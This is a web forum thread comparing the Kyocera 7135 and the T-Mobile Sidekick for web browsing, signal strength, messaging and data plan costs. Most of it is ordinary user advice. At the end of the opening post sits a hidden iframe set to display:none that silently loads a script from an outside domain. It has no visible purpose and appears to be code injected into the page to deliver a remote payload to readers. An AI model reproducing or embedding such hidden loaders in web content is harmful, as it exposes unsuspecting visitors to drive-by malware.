+ Reply to Thread

Web browsing: Kyocera 7135 Vs. T-mobile Sidekick

For those who have tried both devices. I would like to know which device is superior at web browsing. And whether the Kyocera 7135 and Verizon's service is worth the extra money and contractual obligations.

I would also like to know how Instant Messaging compares on both devices and what programs are available for the 7135.

VS.

Also does Verizon have a cheaper unlimited data plan than the $80 Express Network plan? I can't imagine signing a contract for 2 years at $80. That's insane.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

It's all about signal!

I just switched to Verizon, from T-Mobile. It is my understanding that T-Mobile uses GSM digital and NO analog. I do not live in a megalopolis area (Baltimore/DC) and was constantly out of services areas. Even along major interstates in PA I would lose service...meanwhile while traveling w/my niece and her Verizon phone...she ALWAYS had signals.

Switched to Verizon - and the 7135 - and couldn't be happier. I get signal strength 95% of the time - and it has never gone into analog yet! I have it set to beep when I lose and gain signal...so I am not assuming I have signal all the time. If it loses a signal in the car, and I pick it up out of the drink holder, the signal bounces right back.

Soon I will be purchasing a car mount for it.

Cindy
    Love my 7135!

I am usually on Long Island or around Washington D.C., but I also travel to Los Angeles, Tampa, San Francisco, and Miami sometimes. I don't know if signal strength would be a big problem in those areas. My brother has an old phone with T-Mobile and he hasn't had any major difficulties in those areas.

As a former Sidekick owner, I can say that the 7135 is much more reliable. I've listed some of the issues/complaints with the Sidekick below:

- GPRS signal was down more than it was up making it impossible to access the web when you need to. When it was working, many sites were returned as unreachable. No java.
    - B&W screen
    - Constant dropped calls - known issues with the unit's antenna
    - No speakerphone
    - Calls would come in but Sidekick would not ring - a known software problem
    - Very awkward to use as a phone
    - Terrible signal strength. The worst of any phone I ever owned
    - Hardware integrity - many problems with broken keys, screens, etc

I was told by T-Mobile that this device has caused them a lot of problems and the stores have stopped selling them. There is a new color screen version coming out that may have more reliable software but that's a gamble with T-Mobile's network. The one thing I do miss is having a keyboard. That made a huge difference when entering data and was a big plus for the SK.

Verizon's network is unbeatable at this time and I've experience none of the problems listed above. The 7135 does do a better job of web browsing. However, I am still looking for that perfect Palm OS browser. They all have their limitations and I've tried them all.

I'm not really that interested in the talk functions of either phone, that would only be a secondary use.

I'm leaning towards the Sidekick right now because T-mobile's service is only $40 a month for voice and unlimited data. Also I can get the Sidekick for under $100 with a 1 year contract. I would be willing to pay $500 for the 7135 even with the 2 year contract, but Verizon so far sounds like a nightmare to deal with regarding their voice and data plans. If it is is $50 or $80 just for data on the 7135 then the whole thing is not even affordable at this point. It sounds like Verizon has good coverage, but their data prices sound astronomical to me.

From a hardware standpoint it's a toss up for me. The Sidekick has the widescreen, keyboard, and built in AIM support, and Danger formats the webpages to fit the unit perfectly and download quickly. The 7135 of course has the advantage that it's a palm device compatible with all sorts of software programs and web browsers and of course it also has the color screen.

I think I would go for the 7135 if Verizon offered a reasonable data plan, but that doesn't look like it's going to happen.

First of all, you do not need a data plan to access the web on your 7135. You can connect via QNC which uses your minutes. I have free nights & weekends so that works for me.

Since you are mainly interested in using the SK for data, you may want to pay attention to the GPRS signal issues. There are many reported problems getting and maintaining a data signal. You may want to do some more research on the Sidekick before locking into a contract. Check out the link below.

And In case you have problems finding a new SK, check Ebay. Everyone seems to be dumping their old units.

http://www.hiptop.com/forums/viewforum.php?f=34